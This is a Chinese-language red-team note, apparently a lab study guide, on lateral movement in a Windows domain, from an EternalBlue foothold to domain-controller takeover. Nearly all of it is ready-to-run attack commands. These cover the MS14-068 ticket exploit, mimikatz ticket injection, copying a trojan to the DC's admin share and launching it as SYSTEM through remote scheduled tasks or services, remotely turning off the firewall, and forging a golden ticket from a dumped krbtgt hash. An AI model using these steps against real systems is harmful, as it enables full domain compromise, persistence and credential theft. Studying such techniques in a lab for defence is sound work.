横向移动的概念
红队和蓝队:
红队(APT) ==> 攻击方
蓝队 ==> 守方
横向移动(内网漫游): 在内网网段中, 拿下了一台主机, 以这台主机为跳板, 向旁边的主机取做渗透. 直到拿下整个环境(拿下域控)
net view ==> 看当前域内在线成员
net view /domain ==> 看当前有几个域环境
横向移动
以win 7 为跳板, 向域控进行渗透
用永恒之蓝攻击win7
做信息搜集
用ms14-068向域控提权
ms14068 -u ilu@ilu.com -d 192.168.1.141 -s S-1-5-21-542716808-1865610110-2530282010-1105 -p 123123q.
注入之前: 需要清除票据
CMD: klist purge 清除票据 | klist 查看票据
mimikatz: kerberos::purge 清除票据 | kerberos::list 查看票据
清除票据后注入票据:
mimikatz “privilege::debug” “kerberos::ptc xxxx.ccache” exit
dir \\域控主机名\C$ ==>
访问成功即漏洞利用成功, 拿到域控权限上传木马到域控并启动木马, 获取shell
copy 木马 \\域控主机名\C$
有两种方式运行木马:
以计划任务的方式运行 ==> 推荐用(可以以system运行)
schtasks
创建计划任务
schtasks /create /s WIN-AFETP0IBEKR /tn w /ru system /tr “c:\shell.exe” /sc onstart
运行
schtasks /run /s WIN-AFETP0IBEKR /tn w
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24参数列表:
/Create 创建新计划任务。
/Delete 删除计划任务。
/Query 显示所有计划任务。
/Change 更改计划任务属性。
/Run 按需运行计划任务。
/End 中止当前正在运行的计划任务。
/ShowSid 显示与计划的任务名称相应的安全标识符。
/? 显示此帮助消息。
/create:
/S system 连接远程主机
/RU username ==> <system> 指定运行文件的用户
/SC schedule 计划任务运行的频率
/TR taskrun ==> 设置要运行的程序
/TN taskname ==> 给计划任务取名字
/F ==> 强制创建
2. 以服务的方式运行木马
sc <server> create [service name] [binPath= ] options...
1. 关闭防火墙
sc \\WIN-AFETP0IBEKR create e binpath= "netsh advfirewall set allprofiles state off"
sc \\WIN-AFETP0IBEKR start e
2. 运行木马
sc \\WIN-AFETP0IBEKR create mua binpath= "c:\\service.exe"
sc \\WIN-AFETP0IBEKR start mua拿下域控, 提权, 拿到krbtgt票据
hashdump 拿 krbtgt hash
制作金票
golden_ticket_create :
-d : 域名
-k : krbtgt NTLM
-s : 域sid
-t : 指定生成的文件(tck)
-u : 要伪造的用户
清除票据
kerberos_ticket_purge
创建票据
golden_ticket_create -d ilu.com -u adminsitrator -k 9d093f0496bcbbf9999845340c57cd6b -s S-1-5-21-542716808-1865610110-2530282010 -t gold.tck
注入票据
kerberos_ticket_use gold.tck
1 | load kiwi ==> msf加载mimikatz |